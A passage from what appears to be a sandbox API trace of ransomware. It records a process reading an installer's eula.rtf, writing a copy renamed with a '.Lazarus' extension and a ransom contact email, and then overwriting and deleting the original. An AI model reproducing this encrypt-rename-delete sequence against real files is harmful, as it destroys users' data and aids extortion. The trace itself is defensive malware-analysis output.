lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.678] AreFileApisANSI () returned 1 [0072.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0072.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0072.678] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd)) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.678] AreFileApisANSI () returned 1 [0072.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0072.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0072.679] GetLastError () returned 0x0 [0072.679] SetLastError (dwErrCode=0x0) [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0072.679] GetLastError () returned 0x0 [0072.679] SetLastError (dwErrCode=0x0) [0072.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0072.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0072.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0072.679] AreFileApisANSI () returned 1 [0072.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0072.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x80a30 [0072.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0072.680] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.682] GetFileType (hFile=0x410) returned 0x1 [0072.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0072.682] AreFileApisANSI () returned 1 [0072.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0072.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0072.682] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.682] GetFileType (hFile=0x418) returned 0x1 [0072.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0072.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.683] GetLastError () returned 0x0 [0072.683] SetLastError (dwErrCode=0x0) [0072.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.683] GetLastError () returned 0x0 [0072.683] SetLastError (dwErrCode=0x0) [0072.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.683] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0xbfd, lpOverlapped=0x0) returned 1 [0072.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0072.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.987] GetLastError () returned 0x0 [0072.987] SetLastError (dwErrCode=0x0) [0072.987] GetLastError () returned 0x0 [0072.987] SetLastError (dwErrCode=0x0) [0072.987] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.987] GetLastError () returned 0x0 [0072.987] SetLastError (dwErrCode=0x0) [0072.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd) returned 0x7d5b8 [0072.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0072.987] GetLastError () returned 0x0 [0072.987] SetLastError (dwErrCode=0x0) [0072.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0072.988] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0xc00, lpOverlapped=0x0) returned 1 [0072.989] GetLastError () returned 0x0 [0072.989] SetLastError (dwErrCode=0x0) [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0072.989] GetLastError () returned 0x0 [0072.989] SetLastError (dwErrCode=0x0) [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0072.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.989] CloseHandle (hObject=0x410) returned 1 [0072.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.991] CloseHandle (hObject=0x418) returned 1 [0072.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.991] AreFileApisANSI () returned 1 [0072.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0072.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0072.991] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.993] GetFileType (hFile=0x418) returned 0x1 [0072.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.993] GetLastError () returned 0xb7 [0072.993] SetLastError (dwErrCode=0xb7) [0072.993] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.994] CloseHandle (hObject=0x418) returned 1 [0072.994] AreFileApisANSI () returned 1 [0072.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0072.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0072.995] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 1 [0072.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0072.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.996] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0072.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0072.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0072.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0072.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.997] AreFileApisANSI () returned 1 [0072.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0072.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0072.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.997] AreFileApisANSI () returned 1 [0072.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0072.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0072.998] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.998] GetFileType (hFile=0x418) returned 0x1 [0072.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.998] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.998] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.998] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.998] CloseHandle (hObject=0x418) returned 1 [0072.999] AreFileApisANSI () returned 1 [0072.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0072.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0072.999] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.999] GetFileType (hFile=0x418) returned 0x1 [0072.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.999] CloseHandle (hObject=0x418) returned 1 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0072.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 